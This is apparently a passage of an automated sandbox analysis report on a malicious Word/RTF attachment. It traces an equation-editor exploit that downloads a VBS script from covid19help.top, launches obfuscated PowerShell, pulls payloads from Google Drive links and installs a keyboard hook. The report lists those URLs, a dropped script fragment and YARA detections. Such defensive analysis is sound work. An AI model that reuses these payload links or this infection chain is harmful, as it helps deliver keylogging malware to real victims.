Source: global traffic	HTTP traffic detected: GET /Transfusionist.vbs HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: covid19help.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1H8v0Z9q8BO4UTENkbTaiWpci8Y0jYRn3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1H8v0Z9q8BO4UTENkbTaiWpci8Y0jYRn3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1Ir2jUNIAbfpPtpamNP91Yb3wOsJFyvQ- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1Ir2jUNIAbfpPtpamNP91Yb3wOsJFyvQ-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: Keep-AliveCache-Control: no-cacheHost: drive.usercontent.google.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1Ir2jUNIAbfpPtpamNP91Yb3wOsJFyvQ- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1Ir2jUNIAbfpPtpamNP91Yb3wOsJFyvQ-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: Keep-AliveCache-Control: no-cacheHost: drive.usercontent.google.com
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1Ir2jUNIAbfpPtpamNP91Yb3wOsJFyvQ- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1Ir2jUNIAbfpPtpamNP91Yb3wOsJFyvQ-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: Keep-AliveCache-Control: no-cacheHost: drive.usercontent.google.com
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: covid19help.top

Source: EQNEDT32.EXE, 00000002.00000002.348699576.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005040000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EQNEDT32.EXE, 00000002.00000002.348699576.0000000000668000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.348699576.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005018000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000002.00000002.348699576.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005018000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000002.00000002.348699576.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005018000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000002.00000002.348699576.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005040000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.348699576.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005018000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.348699576.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005018000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.560349981.0000000020B61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.351510672.0000000000468000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.351516195.000000000046C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wab.exe, 0000000F.00000002.560349981.0000000020B61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabV
Source: powershell.exe, 00000007.00000002.476890529.0000000002D0E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: wab.exe, 0000000F.00000002.562554109.0000000020E9C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.myhydropowered.com
Source: powershell.exe, 00000007.00000002.481865683.0000000003469000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: EQNEDT32.EXE, 00000002.00000002.348699576.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005018000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000002.00000002.348699576.0000000000668000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005018000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000002.00000002.348699576.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005018000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000002.00000002.348699576.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005018000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000002.00000002.348699576.0000000000668000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005018000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000002.00000002.348699576.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005018000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000002.00000002.348699576.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005018000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: wab.exe, 0000000F.00000002.560349981.0000000020BA4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.562554109.0000000020E9C000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.560349981.0000000020B31000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.560349981.0000000020B0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r3.i.lencr.org/0
Source: wab.exe, 0000000F.00000002.560349981.0000000020BA4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.562554109.0000000020E9C000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.560349981.0000000020B31000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.560349981.0000000020B0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: powershell.exe, 00000007.00000002.476890529.0000000002446000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.436497119.0000000002441000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.562554109.0000000020E41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: EQNEDT32.EXE, 00000002.00000002.348699576.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005018000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000002.00000002.348699576.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005018000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: wab.exe, 0000000F.00000002.560349981.0000000020BA4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.560349981.0000000020B31000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.560349981.0000000020B0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: wab.exe, 0000000F.00000002.560349981.0000000020BA4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.560349981.0000000020B31000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.560349981.0000000020B0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: wab.exe, 0000000F.00000002.562554109.0000000020E41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: powershell.exe, 00000007.00000002.476890529.0000000002703000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000007.00000002.481865683.0000000003469000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.481865683.0000000003469000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.481865683.0000000003469000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: EQNEDT32.EXE, 00000002.00000002.348699576.0000000000636000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://covid19help.top/
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.348699576.000000000060F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://covid19help.top/Transfusionist.vbs
Source: EQNEDT32.EXE, 00000002.00000002.348699576.000000000060F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://covid19help.top/Transfusionist.vbsj
Source: EQNEDT32.EXE, 00000002.00000002.348699576.000000000060F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://covid19help.top/Transfusionist.vbsssC:
Source: EQNEDT32.EXE, 00000002.00000002.348699576.0000000000636000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://covid19help.top/ch
Source: powershell.exe, 00000007.00000002.476890529.000000000257E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000007.00000002.483917917.0000000004FC0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.476890529.000000000257E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.436497119.000000000257E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1H8v0Z9q8BO4UTENkbTaiWpci8Y0jYRn3
Source: wab.exe, 0000000F.00000002.551423696.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1Ir2jUNIAbfpPtpamNP91Yb3wOsJFyvQ-
Source: powershell.exe, 00000007.00000002.476890529.0000000002707000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com
Source: wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: powershell.exe, 00000007.00000002.476890529.0000000002707000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1H8v0Z9q8BO4UTENkbTaiWpci8Y0jYRn3&export=download
Source: wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1Ir2jUNIAbfpPtpamNP91Yb3wOsJFyvQ-&export=download
Source: powershell.exe, 00000007.00000002.481865683.0000000003469000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: EQNEDT32.EXE, 00000002.00000002.348699576.0000000000668000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.348699576.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005018000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000007.00000002.476890529.0000000002703000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000007.00000002.476890529.0000000002703000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000007.00000002.476890529.0000000002703000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000007.00000002.476890529.0000000002703000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000007.00000002.476890529.0000000002703000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown	Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown	Network traffic detected: HTTP traffic on port 49182 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49182
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49177 -> 443

Source: unknown	HTTPS traffic detected: 172.67.175.222:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.215.102:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.122.132:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.215.138:443 -> 192.168.2.22:49176 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.122.132:443 -> 192.168.2.22:49177 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.215.138:443 -> 192.168.2.22:49182 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.122.132:443 -> 192.168.2.22:49183 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe

Drops certificate files (DER)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: COACH APRIL ORDER.doc, type: SAMPLE	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3548, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3752, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4

Screenshot OCR: Enable editing") from the yellow bar aboveASSIGNMENTMCS 473: MARKETING MANAGEMENT & STRATEGYSTUDENT

Potential malicious VBS script found (suspicious strings)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Dropped file: Nostalgiske.ShellExecute Subjectiveness,Skiffs,"","" ,Undersiders			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Dropped file: Nostalgiske.ShellExecute Subjectiveness,Skiffs,"","" ,Undersiders			Jump to dropped file

Very long command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 6874
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 6874
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 6874
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 6874
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 6874	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 6874	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 6874
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 6874

Writes or reads registry keys via WMI

Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey

Wscript starts Powershell (via cmd or directly)

